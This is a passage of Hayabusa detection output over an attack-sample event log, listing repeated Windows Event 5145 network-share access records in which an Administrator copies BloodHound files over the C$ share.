0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 